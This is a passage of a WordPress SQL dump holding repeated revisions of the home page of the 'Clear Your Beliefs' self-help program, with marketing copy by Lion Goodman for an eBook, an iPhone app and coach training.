your old beliefs don''t come back.\n\n<p style="font-size: 1.1em;"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p> <em>What do I want to experience?</em><em>What belief is creating this experience I don''t want?</em><em>How can I change my belief so I can change my experience?</em><p><strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback.  I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman&nbsp;', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-03 11:58:14', '2014-11-03 16:58:14', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1644, 2, '2014-11-03 12:03:53', '2014-11-03 17:03:53', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPHONE APP</a>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPAD APP</a>\n<p style="font-size: 10px; text-align: center;">iClearIt is not yet available for Android or other platforms.</p>\n\nComplete Program\n<img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg">\n<p style="text-align: center; margin-top: 37px; font-size: 18px;"> <strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<p style="text-align: center; margin-top: 37px;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 30px;"><strong>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> LEARN MORE</a> </strong>\n<p style="font-size: 1.1em; margin-left: 10px; margin-bottom: -23px !important;">The <em>Clear Your Beliefs</em> Program… and  How and Why…</p>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<p style="margin-left: 10px; margin-bottom: 14px !important;">How and Why It Works So Well</p>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<p style="font-size: 1.1em;"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p> <em>What do I want to experience?</em><em>What belief is creating this experience I don''t want?</em><em>How can I change my belief so I can change my experience?</em><p><strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback.  I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman&nbsp;', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-03 12:03:53', '2014-11-03 17:03:53', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1645, 2, '2014-11-03 12:04:47', '2014-11-03 17:04:47', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;width: 1035px !important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPHONE APP</a>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPAD APP</a>\n<p style="font-size: 10px; text-align: center;">iClearIt is not yet available for Android or other platforms.</p>\n\nComplete Program\n<img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg">\n<p style="text-align: center; margin-top: 37px; font-size: 18px;"> <strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<p style="text-align: center; margin-top: 37px;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 30px;"><strong>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> LEARN MORE</a> </strong>\n<p style="font-size: 1.1em; margin-left: 10px; margin-bottom: -23px !important;">The <em>Clear Your Beliefs</em> Program… and  How and Why…</p>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<p style="margin-left: 10px; margin-bottom: 14px !important;">How and Why It Works So Well</p>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<p style="font-size: 1.1em;"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p> <em>What do I want to experience?</em><em>What belief is creating this experience I don''t want?</em><em>How can I change my belief so I can change my experience?</em><p><strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback.  I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman&nbsp;', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-03 12:04:47', '2014-11-03 17:04:47', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1648, 2, '2014-11-04 18:29:29', '2014-11-04 23:29:29', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPHONE APP</a>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPAD APP</a>\n<p style="font-size: 10px; text-align: center;">iClearIt is not yet available for Android or other platforms.</p>\n\nComplete Program\n<img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg">\n<p style="text-align: center; margin-top: 37px; font-size: 18px;"> <strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<p style="text-align: center; margin-top: 37px;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 30px;"><strong>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> LEARN MORE</a> </strong>\n<h1>The <em>Clear Your Beliefs</em> Program empowers you to...</h1>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2 style="font-size: 1.1em"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important;margin-top: 5px ! important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</strong></h2><p style="font-size: 1.1em"><strong>Creator of the <em>Clear Your Beliefs</em> program.  </strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p> <em>What do I want to experience?</em><em>What belief is creating this experience I don''t want?</em><em>How can I change my belief so I can change my experience?</em><p><strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback.  I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman&nbsp;', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-04 18:29:29', '2014-11-04 23:29:29', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1651, 2, '2014-11-04 18:35:14', '2014-11-04 23:35:14', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPHONE APP</a>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPAD APP</a>\n<p style="font-size: 10px; text-align: center;">iClearIt is not yet available for Android or other platforms.</p>\n\nComplete Program\n<img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg">\n<p style="text-align: center; margin-top: 37px; font-size: 18px;"> <strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<p style="text-align: center; margin-top: 37px;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 30px;"><strong>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> LEARN MORE</a> </strong>\n<h1>The <em>Clear Your Beliefs</em> Program empowers you to...</h1>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<p style="font-size: 1.1em"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important;margin-top: 5px ! important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</strong><strong>Creator of the <em>Clear Your Beliefs</em> program. </strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p> <em>What do I want to experience?</em><em>What belief is creating this experience I don''t want?</em><em>How can I change my belief so I can change my experience?</em><p><strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback.  I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman&nbsp;', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-04 18:35:14', '2014-11-04 23:35:14', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1649, 2, '2014-11-04 18:30:20', '2014-11-04 23:30:20', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPHONE APP</a>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPAD APP</a>\n<p style="font-size: 10px; text-align: center;">iClearIt is not yet available for Android or other platforms.</p>\n\nComplete Program\n<img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg">\n<p style="text-align: center; margin-top: 37px; font-size: 18px;"> <strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<p style="text-align: center; margin-top: 37px;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 30px;"><strong>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> LEARN MORE</a> </strong>\n<h1>The <em>Clear Your Beliefs</em> Program empowers you to...</h1>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2 style="font-size: 1.1em;"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" data-wp-imgselect="1" />A Note from Lion Goodman</strong></h2><p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.  </strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not 